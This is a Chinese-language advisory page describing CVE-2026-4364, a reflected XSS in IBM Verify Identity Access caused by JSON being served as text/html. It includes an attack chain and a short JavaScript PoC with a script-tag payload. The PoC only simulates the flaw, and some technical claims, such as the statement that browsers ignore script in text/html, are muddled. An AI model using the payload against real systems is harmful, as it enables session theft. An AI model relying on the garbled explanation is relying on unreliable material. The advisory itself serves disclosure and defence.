CVE-2026-4364 CVSS 5.4 中危

CVE-2026-4364 IBM Verify Access内容类型混淆XSS漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4364

漏洞类型

跨站脚本 (XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

IBM Verify Identity Access, IBM Security Verify Access

漏洞概述

IBM Verify Identity Access和Security Verify Access存在安全漏洞。当通过浏览器会话获取证书列表时，服务器返回JSON数据但错误地将Content-Type设置为text/html。由于MIME类型不匹配，浏览器可能将JSON误解析为HTML，导致反射型跨站脚本攻击。

技术细节

该漏洞源于服务器端API响应配置错误。受影响的IBM产品在处理证书列表请求时，尽管返回体为JSON格式，但HTTP响应头Content-Type被指定为text/html。根据RFC标准，浏览器应忽略text/html中的脚本执行，但在某些场景下（如旧版浏览器或特定解析模式），浏览器会将JSON内容中的字符（如尖括号）解析为HTML标签。如果JSON数据中包含攻击者可控的输入（例如证书名称），攻击者即可注入`<script>`标签或事件处理器。由于需要用户会话（PR:L），攻击者需诱导已认证用户访问恶意链接，从而在用户浏览器中执行恶意JavaScript代码，窃取凭证或执行未授权操作。

攻击链分析

STEP 1

侦察

攻击者识别目标系统运行的是易受攻击版本的IBM Verify Identity Access或Security Verify Access。

STEP 2

构造

攻击者构造一个指向证书列表API的URL，并准备好包含恶意JavaScript代码的JSON payload（假设攻击者能影响部分证书数据或利用现有数据结构）。

STEP 3

诱导

攻击者发送钓鱼链接给已登录的受害者，诱导其点击。由于需要低权限认证（PR:L），受害者必须处于登录状态。

STEP 4

执行

受害者的浏览器请求该URL，服务器返回JSON数据但Content-Type为text/html。浏览器将JSON误解析为HTML并执行其中的恶意脚本。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-4364
 * Scenario: Browser receives JSON with Content-Type: text/html
 */

// 1. Attacker crafts a link to the vulnerable certificate listing endpoint
// 2. Victim (logged in) clicks the link or visits a page making this request

fetch('https://target-server/iva/certificates', {
    method: 'GET',
    credentials: 'include' // Send session cookies
})
.then(response => {
    // The server responds with Content-Type: text/html
    console.log("Content-Type:", response.headers.get('Content-Type')); 
    return response.text();
})
.then(data => {
    // If the JSON payload contains: {"cert": "<script>alert('XSS')</script>"}
    // and the browser treats the response as HTML, the script executes.
    
    // Simulating the vulnerability by forcing HTML parsing
    const parser = new DOMParser();
    const doc = parser.parseFromString(data, 'text/html');
    
    // If the data was treated as script, it would run here.
    document.body.innerHTML = data;
    
    console.log("Check if alert box appeared");
});

影响范围

IBM Verify Identity Access 11.0 - 11.0.2

IBM Security Verify Access 10.0 - 10.0.9.1

防御指南

临时缓解措施

在未安装补丁前，建议在网络边界部署Web应用防火墙（WAF），检测并拦截Content-Type与内容不符的响应。同时，加强对用户的网络安全意识教育，避免点击不可信链接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4364
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4364
3 Details https://www.cvedetails.com/cve/CVE-2026-4364/
4 VulDB https://vuldb.com/cve/CVE-2026-4364
5 Link https://www.ibm.com/support/pages/node/7268253

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表